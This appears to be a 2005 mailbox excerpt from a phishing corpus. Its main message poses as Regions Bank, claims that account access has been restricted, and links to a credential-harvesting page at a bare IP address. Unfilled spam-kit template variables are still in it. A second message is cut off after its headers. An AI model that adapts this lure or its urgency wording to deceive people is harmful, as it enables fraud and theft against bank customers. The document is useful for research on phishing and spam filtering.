From: "Regions Bank" <%FROM_USER@hotmail.com>
Reply-To: "Regions Bank" <%FROM_USER@hotmail.com>
To: bwiz@domain.com, ceremony@domain.com, digest@domain.com,
	jeremie@domain.com, username@domain.com, kra@domain.com,
	majordomo@domain.com, outgoing@domain.com, philen@domain.com,
	shinobi@domain.com
Subject: Update account information
Date: Sun, 20 Mar 2005 12:16:05 -0100
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
Organization: Microsoft Outlook Express 5.00.2919.6700
Content-Type: multipart/alternative;
	boundary="9323327007354737001"
X-Webmail-Time: Sun, 20 Mar 2005 09:24:05 -0400
Status: O
X-Status: 
X-Keywords:                  
X-UID: 229

--9323327007354737001
Content-Type: text/plain; charset=%CHARSET
Content-Transfer-Encoding: quoted-printable

%MAKE_TXT[3-6]

--9323327007354737001
Content-Type: text/html; charset=%CHARSET
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body>
<p><a href=3D"http://193.201.52.17/webalizer/.RegionsNet/"><img src=3D"htt=
p://www.mainstreetnews.com/BanAds/Art/CommArt/RegionsBankLogo.jpeg" border=
=3D"0"></a></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif">Dear Re=
gions Bank 
  Customer,</font></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif">Doing o=
ur weekly 
  security verification of the accounts, we could not verify your current =
information. 
  Either your information has been changed, missing or incomplete.</font><=
/p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif">This ma=
tter has 
  to be immediately corrected for you to be able to access your account, i=
n the 
  meantime your access to online banking has been restricted. </font></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif">To star=
t using 
  your account, please update and verify your information by clicking the =
link 
  below :</font></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"> <a hre=
f=3D"http://193.201.52.17/webalizer/.RegionsNet/">CLICK 
  HERE TO VERIFY YOUR ACCOUNT</a></font></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif">Thank y=
ou for your 
  prompt attention to this matter.</font></p>
<p><font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"> Regard=
s,<br>
  Regions Bank.</font></p>
</body>
</html>

--9323327007354737001--


From sakht@server.register4domain.com  Sun Mar 20 09:17:42 2005
Return-Path: <sakht@server.register4domain.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id A5277536E12
	for <username@login.domain.com>; Sun, 20 Mar 2005 09:17:42 -0500 (EST)
Received: from server.register4domain.com (unknown [66.197.152.21])
	by mail1.domain.com (Postfix) with ESMTP id 58FC885ABCF
	for <username@domain.com>; Sun, 20 Mar 2005 09:04:15 -0500 (EST)
Received: from sakht by server.register4domain.com with local (Exim 4.44)
	id 1DD1FM-0000ub-CA
	for username@domain.com; Sun, 20 Mar 2005 17:47:40 +0330
To: username@domain.com
Subject: seccurity account
